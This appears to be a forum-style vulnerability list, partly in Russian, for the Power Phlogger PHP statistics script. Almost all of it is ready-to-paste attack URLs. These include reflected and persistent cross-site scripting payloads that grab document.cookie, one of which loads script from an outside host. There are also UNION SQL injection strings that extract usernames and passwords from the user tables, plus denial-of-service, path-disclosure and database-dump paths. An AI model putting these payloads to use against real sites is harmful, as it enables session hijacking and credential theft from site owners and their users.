Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability Power Phlogger Rel_Path Remote File Include Vulnerability Power Phlogger Login.PHP SQL Injection Vulnerability Power Phlogger 'css_str' SQL Injection Vulnerability Power Phlogger 2.0.9 Remote|Local File Include Vulnerability Power Phlogger v.2.2.5 (username) SQL Injection XSS: Code: http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit Code: http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://site/dspLogs.php/%22%3E%3Cscript%20src=XSS Code: http://site/dspStats.php/%22%3E%3Cscript%20src=XSS Code: http://site/edCss.php/%22%3E%3Cscript%20src=XSS Code: http://site/edCss.php?action=create+new&fields%5Bcss%5D=%3Cscript%3Ealert(document.cookie)%3C/script%3E XSS (Persistent): Post запрос на странице http://site/edUserprofile.php Code: </textarea><script>alert(document.cookie)</script> В параметре N_your_url Code: "><script>alert(document.cookie)</script> В параметре N_email Code: "><script src=http://site.com В параметрах N_fg_c, N_bg_c(до 30 символов) DoS: http://site/include/get_userdata.php http://site/newaccount_self.php Зацикленные редиректы. (c)MustLive SQL иньекции: Code: http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit Code: http://site/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users-- Full path disclosure: http://site/include/edCss.inc.php http://site/include/foot.inc.php http://site/include/get_csscolors.inc.php http://site/include/head.inc.php http://site/include/head_stuff.inc.php http://site/include/loglist.inc.php http://site/include/pphlogger_send.inc.php http://site/modules/usercreate.php http://site/modules/htmlMimeMail.php http://site/modules/img_vis_per_hour.mod.php http://site/modules/usercreate.php http://site/modules/htmlMimeMail.php http://site/modules/img_vis_per_hour.mod.php http://site/edit_user.php http://site/main-dummy.php http://site/main.php http://site/modules/htmlMimeMail.php http://site/modules/img_vis_per_hour.mod.php http://site/modules/usercreate.php Information disclosure: http://site/modules/db_dump.php Названия базы данных,струкрура таблиц http://site/robots.txt http://site/upgrade/extchange.php http://site/main_location.inc Code: <meta name="PHP Version" content="..." /> <meta name="MYSQL Version" content="..." />
